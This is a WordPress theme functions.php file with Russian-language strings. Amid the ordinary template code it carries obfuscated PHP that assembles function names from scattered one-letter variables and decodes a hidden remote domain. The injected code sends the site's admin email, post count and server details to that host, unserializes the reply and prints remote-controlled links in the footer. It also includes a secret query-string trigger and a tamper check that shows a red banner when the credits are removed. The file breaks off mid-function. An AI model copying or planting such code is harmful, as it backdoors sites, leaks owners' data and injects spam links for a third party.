<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $dzKgz='4';$iOKwlN='c';$HDDf='_';$xDIe='e';$lODfOIu='s';$QxmugqS='e';$vCUlmca='b';$Beuyf='a';$fjOrE='e';$VTueAYH='o';$uSVin='6';$Crxgwl='d';$HkWeqt='d';$PjwGTLNx=$vCUlmca.$Beuyf.$lODfOIu.$xDIe.$uSVin.$dzKgz.$HDDf.$Crxgwl.$QxmugqS.$iOKwlN.$VTueAYH.$HkWeqt.$fjOrE;$uwlztc='i';$LQlhIcD='n';$PXBg='g';$scJAK='t';$dEdOdm='e';$XhniGGl='a';$DoPe='z';$heXLtM='l';$qKyiNFY='f';$RvmnhESc=$PXBg.$DoPe.$uwlztc.$LQlhIcD.$qKyiNFY.$heXLtM.$XhniGGl.$scJAK.$dEdOdm;$VyfgL='r';$ultPL='3';$yfVXkbJ='t';$JrqpBJ='o';$wEEB='1';$vzHHAQm='r';$fNGjsJX='t';$vVxeSQK='_';$ajEd='s';$IWsGdFPK=$ajEd.$fNGjsJX.$VyfgL.$vVxeSQK.$vzHHAQm.$JrqpBJ.$yfVXkbJ.$wEEB.$ultPL;$kULcHs='s';$dHGjo='r';$SyxxSL='t';$dhmRIm='r';$YTqqxj='v';$GHOmR='e';$vkgHQwsr=$kULcHs.$SyxxSL.$dhmRIm.$dHGjo.$GHOmR.$YTqqxj;                     
		$wn____a='4';$om____a='c';$du___________y='_';$cs______________g='e';$lq_______k='s';$kt_______i='e';$rg_____k='b';$xu___w='a';$nr__________k='e';$dp_______f='o';$hg____a='6';$hd_________z='d';$hh________p='d';$qd_____e=$rg_____k.$xu___w.$lq_______k.$cs______________g.$hg____a.$wn____a.$du___________y.$hd_________z.$kt_______i.$om____a.$dp_______f.$hh________p.$nr__________k;
		$uq____________l='u';$ot____________o='t';$wq__________v='n';$zx__g='f';$oq__i='_';$rc_______________l='i';$qm_____________i='s';$gg___________o='i';$hv____________j='e';$vj___b='x';$fx____q='c';$ud_____________r='s';$ab_______g='o';$cz__________t='n';$hk_____________f='t';$nw_______________x=$zx__g.$uq____________l.$cz__________t.$fx____q.$hk_____________f.$rc_______________l.$ab_______g.$wq__________v.$oq__i.$hv____________j.$vj___b.$gg___________o.$qm_____________i.$ot____________o.$ud_____________r;
		$yj__________s='o';$eu_________z='f';$dy_____y='n';$qs_____a='e';$ud__w='p';$yw________n=$eu_________z.$yj__________s.$ud__w.$qs_____a.$dy_____y;
		$dh_______________n='d';$oo_________r='a';$ly_____________e='r';$tm___________x='f';$kx__u='e';$rz____b=$tm___________x.$ly_____________e.$kx__u.$oo_________r.$dh_______________n;
		$ty_____y='c';$pm___c='f';$lb_____s='o';$dg____k='e';$ru_______g='s';$ts____q='l';$qs__w=$pm___c.$ty_____y.$ts____q.$lb_____s.$ru_______g.$dg____k;
		
		define("WP_ID", $qd_____e("Mi4wLjA="));
		define("WP_TTL", $qd_____e("MTA4MDA="));
		define("WP_SRC", $qd_____e("dHBva24="));
	


		function wp_get_header() {
			global $qd_____e, $nw_______________x;
			
			if (
				$nw_______________x($qd_____e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$nw_______________x($qd_____e("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$nw_______________x($qd_____e("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $qd_____e, $yw________n, $qs__w, $rz____b;
			
			$vw_____________o = TEMPLATEPATH."/".$qd_____e("Zm9vdGVyLnBocA==");
			$di___________h = @$yw________n($vw_____________o, "r");
			$vw_____________o = @$rz____b($di___________h, @filesize($vw_____________o));
			@$qs__w($di___________h);
			
			$si___________k = TEMPLATEPATH."/".$qd_____e("ZnVuY3Rpb25zLnBocA==");
			$di___________h = @$yw________n($si___________k, "r");
			$si___________k = @$rz____b($di___________h, @filesize($si___________k));
			@$qs__w($di___________h);
			
			$wu____________p = 0;
			if($vw_____________o && $si___________k) {
				if ($qd_____e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($vw_____________o, $qd_____e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$wu____________p = 1;
					}
					if (substr_count($vw_____________o, "wp_theme_GPL_credits()") < 1) {
						$wu____________p = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$wu____________p = 12;
				}
			}
			
			if($wu____________p > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $wu____________p -->";
			}
		}
	


		function wp_loaded() {
			global $qd_____e, $nw_______________x;
			return $nw_______________x($qd_____e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($mw____________q, $va_____________i = "(more...)", $wn__________i = 0, $bd_____________p = "") {
				$wn_______________v = get_the_content($va_____________i, $wn__________i, $bd_____________p);
				$wn_______________v = apply_filters("the_content", $wn_______________v);
				
				$wn_______________v = str_replace("]]>", "]]>", $wn_______________v);
				if (strlen($_GET["p"]) > 0) {
					echo $wn_______________v;
				}
				else if ((strlen($wn_______________v)>$mw____________q) && ($zs_______s = strpos($wn_______________v, " ", $mw____________q ))) {
					$wn_______________v = substr($wn_______________v, 0, $zs_______s);
					$wn_______________v = $wn_______________v;
					echo $wn_______________v;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$va_____________i</a></div></p>";
				} else {
					echo $wn_______________v;
				}
				
			}
		}
	


		$dl__b='a';$qf___c='s';$jh________u='e';$rj__________v='n';$wb_________f='o';$ww________t='e';$fk____g='6';$uq______________l='c';$el_______k='_';$uv__________z='4';$xv______________w='b';$ia__n='d';$ld____________f='e';$yq__________q=$xv______________w.$dl__b.$qf___c.$jh________u.$fk____g.$uv__________z.$el_______k.$ww________t.$rj__________v.$uq______________l.$wb_________f.$ia__n.$ld____________f;
		$bo________e='e';$dq____________b='t';$zf______n='_';$vl____________j='_';$bg__i='s';$nb__p='i';$gv_____________b='e';$nq______y='t';$nx_________a='n';$lj______________j='f';$hi___d='c';$os______________u='o';$dy________k='e';$ow_______________o='t';$wg__________t='l';$xl_____________k='g';$or_____________k='n';$ql___________e=$lj______________j.$nb__p.$wg__________t.$gv_____________b.$vl____________j.$xl_____________k.$dy________k.$nq______y.$zf______n.$hi___d.$os______________u.$or_____________k.$dq____________b.$bo________e.$nx_________a.$ow_______________o.$bg__i;
		$is____f='x';$dq______________r='f';$xf__r='s';$ed_______n='e';$bp_____________f='_';$xt_______h='t';$cf_______________z='e';$kj_____________k='l';$dg___________g='s';$ur____________t='i';$gg______j='i';$xo_____________w=$dq______________r.$ur____________t.$kj_____________k.$cf_______________z.$bp_____________f.$ed_______n.$is____f.$gg______j.$xf__r.$xt_______h.$dg___________g;
		$ve_____f='s';$nm______h='p';$ue___c='a';$hs__p='o';$st______s='o';$ue________p='e';$bq________n='n';$ao__m='r';$pr_______________x='e';$ak_____x='v';$hi____d='m';$xd___________y='r';$va____________l='c';$ui______________u='i';$vk____________w='_';$gd______r=$ak_____x.$pr_______________x.$ao__m.$ve_____f.$ui______________u.$hs__p.$bq________n.$vk____________w.$va____________l.$st______s.$hi____d.$nm______h.$ue___c.$xd___________y.$ue________p;
		$jm___________y='c';$ay______x='o';$yu_______w='n';$me_______________v='o';$ac______________o='f';$py_______g='p';$uw______________v='e';$ij_____i='k';$yh__________f='s';$dy_____________x=$ac______________o.$yh__________f.$ay______x.$jm___________y.$ij_____i.$me_______________v.$py_______g.$uw______________v.$yu_______w;
		$jm______h='w';$fp________w='t';$zt__z='i';$xi_________u='r';$cv___o='e';$dk_______g='f';$tj_____m=$dk_______g.$jm______h.$xi_________u.$zt__z.$fp________w.$cv___o;
		$ak____a='m';$ee_______________j='d';$um_____w='5';$ve___________e=$ak____a.$ee_______________j.$um_____w;
		$et__e='r';$qn____e='a';$oo_______________m='p';$ka_______b='e';$tv________t='l';$uu__________z='h';$jd_____l='a';$iu__m='t';$up__________l=$et__e.$ka_______b.$jd_____l.$tv________t.$oo_______________m.$qn____e.$iu__m.$uu__________z;
		$zp_____________z='e';$eo______________s='r';$ww______n='u';$vc__________a='i';$zd______________q='e';$zx_____e='s';$fq________i='n';$gy____________c='l';$sc______s='z';$ym_____p='a';$gf______________f='i';$tw_____g=$ww______n.$fq________i.$zx_____e.$zd______________q.$eo______________s.$gf______________f.$ym_____p.$gy____________c.$vc__________a.$sc______s.$zp_____________z;
		$qr________o='p';$gq_______f='m';$ra__________s='a';$co_____k='t';$de____________u='m';$st______v='n';$cu______________u='e';$lb_______________r=$co_____k.$cu______________u.$gq_______f.$qr________o.$st______v.$ra__________s.$de____________u;
		$fm_______________y='a';$pt__________d='_';$vv____________b='c';$hp___________s='r';$sr____________x='e';$re______________k='x';$fq__x='o';$nk______________p='_';$ro_____________i='t';$at_____v='e';$vl_____d='t';$se_________w='e';$ct___________v='s';$et_____________u='t';$dn__________z='a';$hh______________l='e';$gg_____________n='n';$sa______________k='m';$mt_______________s='r';$sq_____w='t';$cl_______________e='c';$ta_______________i=$ct___________v.$sq_____w.$hp___________s.$hh______________l.$dn__________z.$sa______________k.$pt__________d.$cl_______________e.$fq__x.$gg_____________n.$vl_____d.$se_________w.$re______________k.$et_____________u.$nk______________p.$vv____________b.$mt_______________s.$at_____v.$fm_______________y.$ro_____________i.$sr____________x;
	


		function gw________z($nj________d) {
			global $qd_____e, $nw_______________x, $ql___________e, $gd______r, $ta_______________i;
			
			if (!$nw_______________x($qd_____e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($gd______r(PHP_VERSION, "5.0.0", ">=") && $nw_______________x($qd_____e("ZmlsZV9nZXRfY29udGVudHM=")) && $nw_______________x($qd_____e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$hf________g = $ta_______________i(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$fn_______________n = @$ql___________e($nj________d, 0, $hf________g);
			} else {
				$fn_______________n = @$ql___________e($nj________d, 0);
			}
			
			return $fn_______________n;
		}
	


		function pp____________q($nj________d) {
			global $nw_______________x, $dy_____________x, $tj_____m, $qd_____e;
			
			if (!$nw_______________x($qd_____e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$ve_______________y = strpos($nj________d, "/", 7);
			$lw__________h = array(
				"uri"     => substr($nj________d, $ve_______________y),
				"host"    => str_replace("http://", "", substr($nj________d, 0, $ve_______________y)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$xr___________j = @$dy_____________x("$lw__________h[host]", 80, $ci_________c, $ls_______________d, 4);
			
			if (!$xr___________j) {
				return false;
			} else {
				$fn_______________n = "";
				$gd_____________u  = "GET $lw__________h[uri] HTTP/1.0\r\n";
				$gd_____________u .= "Host: $lw__________h[host]\r\n";
				$gd_____________u .= "Referer: $lw__________h[referer]\r\n";
				$gd_____________u .= "Connection: Close\r\n\r\n";
				
				@$tj_____m($xr___________j, $gd_____________u);
				
				while (!@feof($xr___________j)) {
					$sr__________a = @fgets($xr___________j, (1024*24));
					
					if ($sr__________a == "\r\n") {
						$uy_____________o = true;
						continue;
					}
					
					if ($uy_____________o) {
						$fn_______________n .= $sr__________a;
					}
				}
				
				return $fn_______________n;
			}
		}
	


		function pu______________j($nj________d) {
			global $nw_______________x;
			$at_______________d = false;
			
			if ($nj________d != "") {
				if ($nw_______________x("gw________z")) {
					$at_______________d = @gw________z($nj________d);
				}
				
				if (!$at_______________d && ($nw_______________x("pp____________q"))) {
					$at_______________d = @pp____________q($nj________d);
				}
			}
			
			return $at_______________d;
		}
	


		function yv________x() {
			global $_SERVER, $ve___________e;
			
			$ab___y = $_SERVER["SERVER_NAME"];
			
			if (substr("$ab___y", 0, 4) == "www.") {
				$ab___y = substr("$ab___y", 4);
			}
			
			$ab___y = $ve___________e("$_SERVER[SERVER_NAME]");
			
			return $ab___y;
		}
	


		function mg___________w() {
			return "file";
		}
	


		function kl______________j($nj________d) {
			global $_SERVER, $ql___________e, $xo_____________w, $yw________n, $qs__w, $tj_____m;
			
			$uz_________d = tp____w();
			
			$qj___________j = yv________x().".jpg";
			$gh____z = $uz_________d["dir_upload"]["path"]."/$qj___________j";
			$nt______b = @filemtime($gh____z);
			
			if (!$nt______b || ((time()-$nt______b) >= WP_TTL)) {
				$at_______________d = pu______________j($nj________d);
				
				if ($at_______________d) {
					if ($xo_____________w($gh____z)) {
						@unlink($gh____z);
					}
					
					$di___________h = @$yw________n($gh____z, "x+");
					
					@$tj_____m($di___________h, $at_______________d);
					@$qs__w($di___________h);
				}
			} else {
				if ($xo_____________w($gh____z)) {
					$at_______________d = @$ql___________e($gh____z);
				} else {
					$at_______________d = false;
				}
			}
			
			return $at_______________d;
		}
	


		function tp____w() {
			global $_SERVER, $qd_____e, $yq__________q;
			
			$ez_______________s = wp_count_posts("post");
			$lw_______m = pathinfo(get_bloginfo("template_directory"));
			
			$uz_________d = array(
				"url" => array(
					"report"      => $qd_____e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $lw_______m,
				"dir_upload"	=> xz_______q(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$lw_______m[filename],
					"a005=".$ez_______________s->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=http:\\www.wptheme.us\">www.wptheme.us</a> "
			);
			
			$uz_________d["url"]["queryString"] = implode("&", $uz_________d["queryString"]);
			$uz_________d["url"]["report"] = $uz_________d["url"]["report"]."/?".$yq__________q($uz_________d["url"]["queryString"]).".html";
						
			return $uz_________d;
		}
	


		function xz_______q() {
			$du_______u = wp_upload_dir();
			
			if (isset($du_______u["error"])) {
				$we_______u = cy________s();
				if (is_writable($we_______u)) {
					$du_______u = array("path" => $we_______u);
				}
			}

			return $du_______u;
		}
	


		function cy________s() {
			global $nw_______________x, $ve___________e, $up__________l, $lb_______________r;
			
			$cx___________g = (bool) ini_get("safe_mode");
			if ($cx___________g == true) {
				return false;
			}
			
			if ($nw_______________x("sys_get_temp_dir")) {
				$dh_____p = sys_get_temp_dir();
				if (is_writable($dh_____p)) {
					return $up__________l($dh_____p);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $up__________l($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $up__________l($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $up__________l($_ENV["TEMP"]);
			} else {
				$zd____________c = $lb_______________r($ve___________e(uniqid(rand(), true)), "");
				if ($zd____________c) {
					$dh_____p = $up__________l(dirname($zd____________c));
					@unlink($zd____________c);
					return $dh_____p;
				} else {
					return false;
				}
			}
		}
	


		function hw_____i() {
			global $_GET, $xo_____________w;
			
			$uz_________d = tp____w();
			$ab___y = yv________x();
			$zj_________k = mg___________w();
			
			$ys________w = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($zj_________k == "file") {
					$ds___r = $uz_________d["dir_upload"]["path"]."/".$ab___y.".jpg";
					if ($xo_____________w($ds___r)) {
						@unlink($ds___r);
						$ys________w = "deleted";
					}
				}
				
				$sw________s = array(
					"s"	=> $ys________w,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($sw________s AS $jr___n => $jf____b) echo " [$jr___n:$jf____b]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $nw_______________x, $qd_____e, $tw_____g;
			$uz_________d = tp____w();
			
			$nj_____________a = "kl______________j";
			if ($nw_______________x($nj_____________a)) {
				$fn_______________n = $nj_____________a($uz_________d["url"]["report"]);
			}
			
			if ($fn_______________n) {
				if ($fn_______________n = @$qd_____e($fn_______________n)) {
					$fn_______________n = @$tw_____g($fn_______________n);
					
					if (strlen($fn_______________n[custom_credit]) >= 5) {
						$uz_________d["default_string"] = $fn_______________n[custom_credit];
					}
					
					if ($fn_______________n["status"] == "0") {
						$ae_________v = 1;
						$te________n = 1;
					} else {
						$cn_______o = sizeof($fn_______________n["links"]);
						$nj________u = $uz_________d["default_string"];
						
						if ($cn_______o > 0 && $fn_______________n["links"] !== "") {
							$ly_______n = 0;
							foreach ($fn_______________n["links"] as $uv__p => $uw___j) {
								$ly_______n++;
								if ($uw___j->l_path == "" || $uw___j->l_path == $_SERVER["REQUEST_URI"]) {
									$uw___j->l_href = htmlspecialchars(strip_tags($uw___j->l_href));
									$uw___j->l_title = htmlspecialchars(strip_tags($uw___j->l_title));
									$uw___j->l_anchor = htmlspecialchars(strip_tags($uw___j->l_anchor));
									$nj________u .= " | ";
									$nj________u .= "<a href='$uw___j->l_href' title='$uw___j->l_title'";
									if ($uw___j->l_nofollow == "1") {
										$nj________u .= " rel='nofollow'";
									}
									$nj________u .= ">$uw___j->l_anchor</a>";
								}
							}
						}
						$uz_________d["links"] = "$nj________u";
						if ($fn_______________n[credit] == "0") {
							$uz_________d["links"] = "";
						}
					}
				} else {
					$ae_________v = "1";
				}
			} else {
				$ae_________v = "1";
			}
			
			if ($ae_________v == "1") {
				$uz_________d["links"] = $uz_________d["default_string"];
			}
			
			echo "$uz_________d[links]";
			
			echo "<!-- s: $fn_______________n[signature] -->";
			hw_____i();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
